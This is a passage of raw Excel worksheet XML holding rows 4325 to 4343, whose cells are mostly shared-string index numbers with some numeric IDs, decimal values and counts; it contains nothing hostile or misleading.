      <c r="H4325" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4325" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4325" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4325" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4325" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4325" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4325" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4325" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4325" s="12">
        <v>3.19</v>
      </c>
      <c r="Q4325" s="12">
        <v>3.19</v>
      </c>
      <c r="R4325" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4325" s="12" t="s">
        <v>27783</v>
      </c>
      <c r="T4325" s="12" t="s">
        <v>27784</v>
      </c>
      <c r="U4325" s="12" t="s">
        <v>27785</v>
      </c>
      <c r="V4325" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4325" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4325" s="12">
        <v>50</v>
      </c>
      <c r="Y4325" s="12" t="s">
        <v>27786</v>
      </c>
    </row>
    <row r="4326" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4326" s="12">
        <v>106571</v>
      </c>
      <c r="B4326" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4326" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4326" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4326" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4326" s="12" t="s">
        <v>27787</v>
      </c>
      <c r="H4326" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4326" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4326" s="12" t="s">
        <v>2488</v>
      </c>
      <c r="K4326" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4326" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4326" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4326" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4326" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4326" s="12" t="s">
        <v>27788</v>
      </c>
      <c r="Q4326" s="12">
        <v>4.3</v>
      </c>
      <c r="R4326" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4326" s="12" t="s">
        <v>27789</v>
      </c>
      <c r="T4326" s="12" t="s">
        <v>27790</v>
      </c>
      <c r="U4326" s="12" t="s">
        <v>27791</v>
      </c>
      <c r="V4326" s="12" t="s">
        <v>5160</v>
      </c>
      <c r="W4326" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4326" s="12">
        <v>11</v>
      </c>
      <c r="Y4326" s="12" t="s">
        <v>27792</v>
      </c>
    </row>
    <row r="4327" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4327" s="12">
        <v>106941</v>
      </c>
      <c r="B4327" s="12" t="s">
        <v>30769</v>
      </c>
      <c r="D4327" s="12" t="s">
        <v>30770</v>
      </c>
      <c r="E4327" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4327" s="12" t="s">
        <v>30773</v>
      </c>
      <c r="G4327" s="12" t="s">
        <v>27793</v>
      </c>
      <c r="H4327" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4327" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4327" s="12" t="s">
        <v>2609</v>
      </c>
      <c r="K4327" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4327" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4327" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4327" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4327" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4327" s="12" t="s">
        <v>27788</v>
      </c>
      <c r="Q4327" s="12">
        <v>4.3</v>
      </c>
      <c r="R4327" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4327" s="12" t="s">
        <v>27794</v>
      </c>
      <c r="T4327" s="12" t="s">
        <v>27790</v>
      </c>
      <c r="U4327" s="12" t="s">
        <v>27795</v>
      </c>
      <c r="V4327" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4327" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4327" s="12">
        <v>39</v>
      </c>
      <c r="Y4327" s="12" t="s">
        <v>27796</v>
      </c>
    </row>
    <row r="4328" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4328" s="12">
        <v>107191</v>
      </c>
      <c r="B4328" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4328" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4328" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4328" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4328" s="12" t="s">
        <v>27797</v>
      </c>
      <c r="H4328" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4328" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4328" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4328" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4328" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4328" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4328" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4328" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4328" s="12" t="s">
        <v>27798</v>
      </c>
      <c r="Q4328" s="12">
        <v>4.3</v>
      </c>
      <c r="R4328" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4328" s="12" t="s">
        <v>27799</v>
      </c>
      <c r="T4328" s="12" t="s">
        <v>27800</v>
      </c>
      <c r="U4328" s="12" t="s">
        <v>27801</v>
      </c>
      <c r="V4328" s="12" t="s">
        <v>6918</v>
      </c>
      <c r="W4328" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4328" s="12">
        <v>6</v>
      </c>
      <c r="Y4328" s="12" t="s">
        <v>27802</v>
      </c>
    </row>
    <row r="4329" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4329" s="12">
        <v>108351</v>
      </c>
      <c r="B4329" s="12" t="s">
        <v>30778</v>
      </c>
      <c r="D4329" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4329" s="12" t="s">
        <v>30772</v>
      </c>
      <c r="G4329" s="12" t="s">
        <v>27803</v>
      </c>
      <c r="H4329" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4329" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4329" s="12" t="s">
        <v>26990</v>
      </c>
      <c r="K4329" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4329" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4329" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4329" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4329" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4329" s="12" t="s">
        <v>27804</v>
      </c>
      <c r="Q4329" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4329" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4329" s="12" t="s">
        <v>27805</v>
      </c>
      <c r="T4329" s="12" t="s">
        <v>27806</v>
      </c>
      <c r="U4329" s="12" t="s">
        <v>27807</v>
      </c>
      <c r="V4329" s="12" t="s">
        <v>3260</v>
      </c>
      <c r="W4329" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4329" s="12">
        <v>1</v>
      </c>
      <c r="Y4329" s="12" t="s">
        <v>27808</v>
      </c>
    </row>
    <row r="4330" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4330" s="12">
        <v>108581</v>
      </c>
      <c r="B4330" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4330" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4330" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4330" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4330" s="12" t="s">
        <v>27809</v>
      </c>
      <c r="H4330" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4330" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4330" s="12" t="s">
        <v>1446</v>
      </c>
      <c r="K4330" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4330" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4330" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4330" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4330" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4330" s="12" t="s">
        <v>27810</v>
      </c>
      <c r="Q4330" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4330" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4330" s="12" t="s">
        <v>27811</v>
      </c>
      <c r="T4330" s="12" t="s">
        <v>27806</v>
      </c>
      <c r="U4330" s="12" t="s">
        <v>27812</v>
      </c>
      <c r="V4330" s="12" t="s">
        <v>27704</v>
      </c>
      <c r="W4330" s="12" t="s">
        <v>27813</v>
      </c>
      <c r="X4330" s="12">
        <v>43</v>
      </c>
      <c r="Y4330" s="12" t="s">
        <v>27814</v>
      </c>
    </row>
    <row r="4331" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4331" s="12">
        <v>109081</v>
      </c>
      <c r="B4331" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4331" s="12" t="s">
        <v>30130</v>
      </c>
      <c r="E4331" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4331" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4331" s="12" t="s">
        <v>27821</v>
      </c>
      <c r="H4331" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4331" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4331" s="12" t="s">
        <v>23336</v>
      </c>
      <c r="K4331" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4331" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4331" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4331" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4331" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4331" s="12" t="s">
        <v>27822</v>
      </c>
      <c r="Q4331" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4331" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4331" s="12" t="s">
        <v>27823</v>
      </c>
      <c r="T4331" s="12" t="s">
        <v>27824</v>
      </c>
      <c r="U4331" s="12" t="s">
        <v>27825</v>
      </c>
      <c r="V4331" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W4331" s="12">
        <v>110371</v>
      </c>
      <c r="X4331" s="12">
        <v>96</v>
      </c>
      <c r="Y4331" s="12" t="s">
        <v>27826</v>
      </c>
    </row>
    <row r="4332" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4332" s="12">
        <v>109431</v>
      </c>
      <c r="B4332" s="12" t="s">
        <v>30388</v>
      </c>
      <c r="C4332" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4332" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4332" s="12" t="s">
        <v>31445</v>
      </c>
      <c r="F4332" s="12" t="s">
        <v>30392</v>
      </c>
      <c r="G4332" s="12" t="s">
        <v>27832</v>
      </c>
      <c r="H4332" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4332" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4332" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K4332" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4332" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4332" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4332" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4332" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4332" s="12" t="s">
        <v>27833</v>
      </c>
      <c r="Q4332" s="12">
        <v>4.3</v>
      </c>
      <c r="R4332" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4332" s="12" t="s">
        <v>27834</v>
      </c>
      <c r="T4332" s="12" t="s">
        <v>4675</v>
      </c>
      <c r="U4332" s="12" t="s">
        <v>27835</v>
      </c>
      <c r="V4332" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W4332" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4332" s="12">
        <v>12</v>
      </c>
      <c r="Y4332" s="12" t="s">
        <v>27836</v>
      </c>
    </row>
    <row r="4333" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4333" s="12">
        <v>109591</v>
      </c>
      <c r="B4333" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4333" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4333" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4333" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4333" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4333" s="12" t="s">
        <v>27837</v>
      </c>
      <c r="H4333" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4333" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4333" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4333" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4333" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4333" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4333" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4333" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4333" s="12" t="s">
        <v>27838</v>
      </c>
      <c r="Q4333" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4333" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4333" s="12" t="s">
        <v>27839</v>
      </c>
      <c r="T4333" s="12" t="s">
        <v>27840</v>
      </c>
      <c r="U4333" s="12" t="s">
        <v>27841</v>
      </c>
      <c r="V4333" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4333" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4333" s="12">
        <v>26</v>
      </c>
      <c r="Y4333" s="12" t="s">
        <v>27842</v>
      </c>
    </row>
    <row r="4334" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4334" s="12">
        <v>110451</v>
      </c>
      <c r="B4334" s="12" t="s">
        <v>30354</v>
      </c>
      <c r="C4334" s="12" t="s">
        <v>30353</v>
      </c>
      <c r="D4334" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4334" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4334" s="12" t="s">
        <v>27856</v>
      </c>
      <c r="H4334" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4334" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4334" s="12" t="s">
        <v>2488</v>
      </c>
      <c r="K4334" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4334" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4334" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4334" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4334" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4334" s="12" t="s">
        <v>27857</v>
      </c>
      <c r="Q4334" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4334" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4334" s="12" t="s">
        <v>27858</v>
      </c>
      <c r="T4334" s="12" t="s">
        <v>27859</v>
      </c>
      <c r="U4334" s="12" t="s">
        <v>27860</v>
      </c>
      <c r="V4334" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4334" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4334" s="12">
        <v>35</v>
      </c>
      <c r="Y4334" s="12" t="s">
        <v>27861</v>
      </c>
    </row>
    <row r="4335" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4335" s="12">
        <v>110551</v>
      </c>
      <c r="B4335" s="12" t="s">
        <v>30769</v>
      </c>
      <c r="D4335" s="12" t="s">
        <v>30773</v>
      </c>
      <c r="F4335" s="12" t="s">
        <v>30773</v>
      </c>
      <c r="G4335" s="12" t="s">
        <v>27862</v>
      </c>
      <c r="H4335" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4335" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4335" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4335" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4335" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4335" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4335" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4335" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4335" s="12" t="s">
        <v>27833</v>
      </c>
      <c r="Q4335" s="12">
        <v>4.3</v>
      </c>
      <c r="R4335" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4335" s="12" t="s">
        <v>27863</v>
      </c>
      <c r="T4335" s="12" t="s">
        <v>27864</v>
      </c>
      <c r="U4335" s="12" t="s">
        <v>27865</v>
      </c>
      <c r="V4335" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4335" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4335" s="12">
        <v>17</v>
      </c>
      <c r="Y4335" s="12" t="s">
        <v>27866</v>
      </c>
    </row>
    <row r="4336" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4336" s="12">
        <v>110711</v>
      </c>
      <c r="B4336" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4336" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4336" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4336" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4336" s="12" t="s">
        <v>27867</v>
      </c>
      <c r="H4336" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4336" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4336" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4336" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4336" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4336" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4336" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4336" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4336" s="12" t="s">
        <v>27868</v>
      </c>
      <c r="Q4336" s="12">
        <v>4.3</v>
      </c>
      <c r="R4336" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4336" s="12" t="s">
        <v>27869</v>
      </c>
      <c r="T4336" s="12" t="s">
        <v>27870</v>
      </c>
      <c r="U4336" s="12" t="s">
        <v>27871</v>
      </c>
      <c r="V4336" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4336" s="12">
        <v>112841</v>
      </c>
      <c r="X4336" s="12">
        <v>23</v>
      </c>
      <c r="Y4336" s="12" t="s">
        <v>27872</v>
      </c>
    </row>
    <row r="4337" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4337" s="12">
        <v>110831</v>
      </c>
      <c r="B4337" s="12" t="s">
        <v>31312</v>
      </c>
      <c r="C4337" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4337" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4337" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4337" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4337" s="12" t="s">
        <v>27873</v>
      </c>
      <c r="H4337" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4337" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4337" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4337" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4337" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4337" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4337" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4337" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4337" s="12" t="s">
        <v>27874</v>
      </c>
      <c r="Q4337" s="12">
        <v>4.0999999999999996</v>
      </c>
      <c r="R4337" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4337" s="12" t="s">
        <v>27875</v>
      </c>
      <c r="T4337" s="12" t="s">
        <v>27876</v>
      </c>
      <c r="U4337" s="12" t="s">
        <v>27877</v>
      </c>
      <c r="V4337" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4337" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4337" s="12">
        <v>34</v>
      </c>
      <c r="Y4337" s="12" t="s">
        <v>27878</v>
      </c>
    </row>
    <row r="4338" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4338" s="12">
        <v>110941</v>
      </c>
      <c r="B4338" s="12" t="s">
        <v>29825</v>
      </c>
      <c r="C4338" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4338" s="12" t="s">
        <v>29830</v>
      </c>
      <c r="E4338" s="12" t="s">
        <v>31563</v>
      </c>
      <c r="F4338" s="12" t="s">
        <v>29826</v>
      </c>
      <c r="G4338" s="12" t="s">
        <v>27879</v>
      </c>
      <c r="H4338" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4338" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4338" s="12" t="s">
        <v>26990</v>
      </c>
      <c r="K4338" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4338" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4338" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4338" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4338" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4338" s="12" t="s">
        <v>27880</v>
      </c>
      <c r="Q4338" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4338" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4338" s="12" t="s">
        <v>27881</v>
      </c>
      <c r="T4338" s="12" t="s">
        <v>27882</v>
      </c>
      <c r="U4338" s="12" t="s">
        <v>27883</v>
      </c>
      <c r="V4338" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4338" s="12">
        <v>113351</v>
      </c>
      <c r="X4338" s="12">
        <v>108</v>
      </c>
      <c r="Y4338" s="12" t="s">
        <v>27884</v>
      </c>
    </row>
    <row r="4339" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4339" s="12">
        <v>111361</v>
      </c>
      <c r="B4339" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4339" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4339" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4339" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4339" s="12" t="s">
        <v>27885</v>
      </c>
      <c r="H4339" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4339" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4339" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4339" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4339" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4339" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4339" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4339" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4339" s="12" t="s">
        <v>27886</v>
      </c>
      <c r="Q4339" s="12">
        <v>4.3</v>
      </c>
      <c r="R4339" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4339" s="12" t="s">
        <v>27887</v>
      </c>
      <c r="T4339" s="12" t="s">
        <v>27888</v>
      </c>
      <c r="U4339" s="12" t="s">
        <v>27889</v>
      </c>
      <c r="V4339" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4339" s="12">
        <v>110871</v>
      </c>
      <c r="X4339" s="12">
        <v>48</v>
      </c>
      <c r="Y4339" s="12" t="s">
        <v>27890</v>
      </c>
    </row>
    <row r="4340" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4340" s="12">
        <v>112911</v>
      </c>
      <c r="B4340" s="12" t="s">
        <v>30769</v>
      </c>
      <c r="D4340" s="12" t="s">
        <v>30770</v>
      </c>
      <c r="E4340" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4340" s="12" t="s">
        <v>30779</v>
      </c>
      <c r="G4340" s="12" t="s">
        <v>27903</v>
      </c>
      <c r="H4340" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4340" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4340" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K4340" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4340" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4340" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4340" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4340" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4340" s="12" t="s">
        <v>27904</v>
      </c>
      <c r="Q4340" s="12">
        <v>4.5</v>
      </c>
      <c r="R4340" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4340" s="12" t="s">
        <v>27905</v>
      </c>
      <c r="T4340" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="U4340" s="12" t="s">
        <v>27906</v>
      </c>
      <c r="V4340" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4340" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4340" s="12">
        <v>29</v>
      </c>
      <c r="Y4340" s="12" t="s">
        <v>27907</v>
      </c>
    </row>
    <row r="4341" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4341" s="12">
        <v>114551</v>
      </c>
      <c r="B4341" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4341" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4341" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4341" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4341" s="12" t="s">
        <v>27908</v>
      </c>
      <c r="H4341" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4341" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4341" s="12" t="s">
        <v>25003</v>
      </c>
      <c r="K4341" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4341" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4341" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4341" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4341" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4341" s="12" t="s">
        <v>27909</v>
      </c>
      <c r="Q4341" s="12">
        <v>4.4000000000000004</v>
      </c>
      <c r="R4341" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4341" s="12" t="s">
        <v>27910</v>
      </c>
      <c r="T4341" s="12" t="s">
        <v>27911</v>
      </c>
      <c r="U4341" s="12" t="s">
        <v>27912</v>
      </c>
      <c r="V4341" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4341" s="12">
        <v>113531</v>
      </c>
      <c r="X4341" s="12">
        <v>26</v>
      </c>
      <c r="Y4341" s="12" t="s">
        <v>27913</v>
      </c>
    </row>
    <row r="4342" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4342" s="12">
        <v>115211</v>
      </c>
      <c r="B4342" s="12" t="s">
        <v>30367</v>
      </c>
      <c r="C4342" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4342" s="12" t="s">
        <v>30355</v>
      </c>
      <c r="F4342" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4342" s="12" t="s">
        <v>27920</v>
      </c>
      <c r="H4342" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4342" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4342" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4342" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4342" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4342" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4342" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4342" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4342" s="12" t="s">
        <v>27921</v>
      </c>
      <c r="Q4342" s="12">
        <v>4.3</v>
      </c>
      <c r="R4342" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4342" s="12" t="s">
        <v>27922</v>
      </c>
      <c r="T4342" s="12" t="s">
        <v>27923</v>
      </c>
      <c r="U4342" s="12" t="s">
        <v>27924</v>
      </c>
      <c r="V4342" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4342" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4342" s="12">
        <v>3</v>
      </c>
      <c r="Y4342" s="12" t="s">
        <v>27925</v>
      </c>
    </row>
    <row r="4343" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4343" s="12">
        <v>115261</v>
      </c>
      <c r="B4343" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4343" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4343" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4343" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4343" s="12" t="s">
        <v>27926</v>
      </c>
      <c r="H4343" s="12" t="s">
        <v>21</v>
      </c>
